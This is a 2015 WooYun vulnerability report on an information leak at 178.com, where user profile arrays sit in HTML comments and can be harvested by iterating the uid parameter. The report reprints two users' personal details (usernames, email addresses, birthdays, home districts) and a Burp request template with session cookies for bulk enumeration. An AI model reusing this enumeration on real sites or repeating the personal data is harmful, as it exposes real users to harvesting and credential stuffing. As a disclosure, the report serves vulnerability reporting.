当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132721

漏洞标题:178游戏重要站点敏感信息泄露

相关厂商:178游戏网

漏洞作者: goubuli

提交时间:2015-08-08 23:03

修复时间:2015-09-24 13:10

公开时间:2015-09-24 13:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-08: 细节已通知厂商并且等待厂商处理中
2015-08-10: 厂商已经确认,细节仅向厂商公开
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

178游戏重要站点敏感信息泄露

详细说明:

wooyun是一个非常好的学习平台。
今天浏览漏洞 WooYun: 178游戏重要站点SQL注射之官渡之战 ,随手又自己测了一下,发现一处信息泄露。
泄露信息包括:id,用户名,性别,生日(年龄),星座,邮箱,真实姓名,QQ,地址,电话等隐私信息。这段泄露的信息是在一段被注释掉的代码中,只有查看页面源文件才能看到。

<!-- 
array(36) {
  ["id"]=>
  string(8) "36791303"
  ["username"]=>
  string(8) "qq981021"
  ["gender"]=>
  NULL
  ["birthday"]=>
  string(10) "1998-11-20"
  ["astro"]=>
  string(9) "天蝎座"
  ["resident"]=>
  NULL
  ["email"]=>
  string(17) "1659486946@qq.com"
  ["realname"]=>
  NULL
  ["qq"]=>
  NULL
  ["msn"]=>
  NULL
  ["cellphone"]=>
  NULL
  ["comefrom"]=>
  NULL
  ["gender_flag"]=>
  string(1) "1"
  ["r_province"]=>
  string(18) "内蒙古自治区"
  ["r_city"]=>
  string(9) "通辽市"
  ["r_district"]=>
  string(9) "奈曼旗"
  ["h_province"]=>
  string(18) "内蒙古自治区"
  ["h_city"]=>
  string(9) "通辽市"
  ["h_district"]=>
  string(9) "奈曼旗"
  ["bloodtype"]=>
  string(1) "3"
  ["marriage"]=>
  string(1) "1"
  ["customer"]=>
  NULL
  ["privacy"]=>
  string(250) "a:9:{s:5:"index";s:1:"0";s:4:"blog";s:1:"0";s:5:"album";s:1:"0";s:8:"comments";s:1:"0";s:4:"poll";s:1:"1";s:6:"search";s:1:"1";s:9:"footprint";s:1:"1";s:7:"friends";s:1:"1";s:3:"sms";a:5:{i:0;s:1:"1";i:1;s:1:"2";i:2;s:1:"3";i:3;s:1:"4";i:4;s:1:"5";}}"
  ["allow_search"]=>
  string(1) "1"
  ["srank"]=>
  array(2) {
    ["srank"]=>
    array(6) {
      ["bloodtype"]=>
      string(1) "1"
      ["marriage"]=>
      string(1) "1"
      ["birthday"]=>
      string(1) "0"
      ["astro"]=>
      string(1) "1"
      ["resident"]=>
      string(1) "0"
      ["home"]=>
      string(1) "1"
    }
    ["index"]=>
    array(7) {
      ["gender"]=>
      string(1) "1"
      ["bloodtype"]=>
      string(1) "1"
      ["marriage"]=>
      string(1) "1"
      ["birthday"]=>
      string(1) "1"
      ["astro"]=>
      string(1) "1"
      ["resident"]=>
      string(1) "1"
      ["home"]=>
      string(1) "1"
    }
  }
  ["notify"]=>
  NULL
  ["status"]=>
  string(1) "0"
  ["is_check"]=>
  string(1) "0"
  ["update_time"]=>
  string(1) "0"
  ["create_time"]=>
  string(1) "0"
  ["acc_email"]=>
  string(17) "1659486946@qq.com"
  ["acc_id"]=>
  string(8) "36791303"
  ["uid"]=>
  string(8) "36791303"
  ["acc_username"]=>
  string(8) "qq981021"
  ["acc_nickname"]=>
  string(8) "qq981021"
  ["nickname"]=>
  string(8) "qq981021"
}
-->


产生原因:

uid可以遍历,http://i.178.com/?uid=36791303
直接查看其他注册用户信息,然后在对应的页面中查看源文件即可


如URL:

http://i.178.com/?uid=36792945


0808_2.png


我就测试了一下,burp跑了一些uid,

GET /?uid=§36790000§ HTTP/1.1
Host: i.178.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _sid=46c23308cb0a98eab7e28be44c160709850008dd; _i=MyGjU0IJ9mk4gWh2UN145kkC8v82F6exNBdg%2BH4WcpjEufjFwzNwzg%3D%3D_bc62bd0a7e57b2536b39a3b54ee44046_1439008048; _l=1439007836; _178c=36809261%23%23testxxxx; _e=31536000; __utma=156161507.1140119810.1439007847.1439007847.1439007847.1; __utmb=156161507.4.10.1439007847; __utmc=156161507; __utmz=156161507.1439007847.1.1.utmcsr=account.178.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmt=1; CNZZDATA30044938=cnzz_eid%3D580410582-1439005044-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1439005044
Connection: keep-alive
If-Modified-Since: Sat, 08 Aug 2015 04:27:27GMT


uid从36790000到36809260,如图

0808_1.png


危害:

由于178的登录只需要知道用户名或者邮箱即可登录,因此可被撞库,用户名被收集等


漏洞证明:

http://i.178.com/?uid=36791190


泄露处

<!-- 
array(36) {
  ["id"]=>
  string(8) "36791190"
  ["username"]=>
  string(15) "兰迪。奥顿"
  ["gender"]=>
  NULL
  ["birthday"]=>
  string(10) "1982-09-17"
  ["astro"]=>
  string(9) "处女座"
  ["resident"]=>
  NULL
  ["email"]=>
  string(17) "1606223294@qq.com"
  ["realname"]=>
  NULL
  ["qq"]=>
  NULL
  ["msn"]=>
  NULL
  ["cellphone"]=>
  NULL
  ["comefrom"]=>
  NULL
  ["gender_flag"]=>
  string(1) "1"
  ["r_province"]=>
  string(9) "四川省"
  ["r_city"]=>
  string(6) "遂宁"
  ["r_district"]=>
  string(9) "大英县"
  ["h_province"]=>
  string(9) "河南省"
  ["h_city"]=>
  string(9) "周口市"
  ["h_district"]=>
  string(9) "扶沟县"
  ["bloodtype"]=>
  string(1) "4"
  ["marriage"]=>
  string(1) "1"
  ["customer"]=>
  NULL
  ["privacy"]=>
  NULL
  ["allow_search"]=>
  string(1) "1"
  ["srank"]=>
  array(2) {
    ["srank"]=>
    array(6) {
      ["bloodtype"]=>
      string(1) "0"
      ["marriage"]=>
      string(1) "3"
      ["birthday"]=>
      string(1) "3"
      ["astro"]=>
      string(1) "3"
      ["resident"]=>
      string(1) "3"
      ["home"]=>
      string(1) "3"
    }
    ["index"]=>
    array(7) {
      ["gender"]=>
      string(1) "1"
      ["bloodtype"]=>
      string(1) "1"
      ["marriage"]=>
      string(1) "1"
      ["birthday"]=>
      string(1) "1"
      ["astro"]=>
      string(1) "1"
      ["resident"]=>
      string(1) "1"
      ["home"]=>
      string(1) "1"
    }
  }
  ["notify"]=>
  NULL
  ["status"]=>
  string(1) "0"
  ["is_check"]=>
  string(1) "0"
  ["update_time"]=>
  string(1) "0"
  ["create_time"]=>
  string(1) "0"
  ["acc_email"]=>
  string(17) "1606223294@qq.com"
  ["acc_id"]=>
  string(8) "36791190"
  ["uid"]=>
  string(8) "36791190"
  ["acc_username"]=>
  string(15) "兰迪。奥顿"
  ["acc_nickname"]=>
  string(15) "兰迪。奥顿"
  ["nickname"]=>
  string(15) "兰迪。奥顿"
}
-->


0808_3.png


修复方案:

删除注释中的代码

版权声明:转载请注明来源 goubuli@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-08-10 13:08

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补该漏洞。

最新状态:

暂无